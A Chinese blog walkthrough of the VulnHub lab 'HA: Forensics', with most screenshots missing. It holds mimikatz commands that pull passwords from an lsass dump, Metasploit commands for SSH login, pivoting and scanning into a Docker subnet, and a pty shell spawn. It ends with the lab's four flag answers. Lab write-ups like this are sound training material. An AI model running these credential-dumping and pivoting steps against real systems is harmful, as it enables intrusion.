VulnHub靶场之HA: FORENSICS

VulnHub靶场之HA: FORENSICS

查看ip:
在这里插入图片描述
扫描端口,发现开放80端口与22端口,访问80端口,,
扫描目录,发现tips.txt:
在这里插入图片描述
下载zip,发现需要密码,访问igolder目录,发现pgp密钥信息啥的,去在线解密:
在这里插入图片描述
破解密码:
在这里插入图片描述
得到flag2:
在这里插入图片描述
压缩包中还存在一个lsass.DMP文件,,
放到minikatz去解一下:

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

得到:
在这里插入图片描述
拿去解密一下:
在这里插入图片描述
ssh连接:
在这里插入图片描述
后续发现sodu不行,ifconfig发现有个docker:
在这里插入图片描述
切换使用msf进行ssh登录,使用其自动路由模块:

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.198.154
set username jasoos
set password Password@1
exploit
session -u 1
use post/multi/manage/autoroute
set session 2
exploit

在这里插入图片描述
在这里插入图片描述
使用ping去扫描存活主机

use post/multi/gather/ping_sweep
set session 2
set rhosts 172.17.0.0/24
exploit

在这里插入图片描述
扫描端口

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set port 1-100
exploit
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit

在这里插入图片描述
进入ftp查看文件:

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001

在这里插入图片描述
下载到靶机本地:
在这里插入图片描述
开启python -m SimpleHTTPServer,下载文件:
在这里插入图片描述
使用autopsy:
在这里插入图片描述
先创建case:
在这里插入图片描述
在这里插入图片描述
创建案例后,需要特定主机,要求提供主机名,填好名称后,单击“添加主机”继续
在这里插入图片描述
创建主机后,要求我们添加一个图像文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
下一步,设置为默认值,然后单击“添加”:
在这里插入图片描述
分析:
在这里插入图片描述
查看文件:
在这里插入图片描述
打开flag:
在这里插入图片描述
打开creds:
在这里插入图片描述
base64解密:
在这里插入图片描述
切换另一个用户:
在这里插入图片描述
总共四个flag,还差一个,图片隐写:
在这里插入图片描述

在这里插入图片描述
全部:
flag1:Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
flag2:Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
flag3:Flag:3 {8442460f48338fe60a9497b8e0e9022f}
flag4:Flag: {9440aee508b6215995219c58c8ba4b45}

猜你喜欢

转载自blog.csdn.net/qq_42967398/article/details/109451501
今日推荐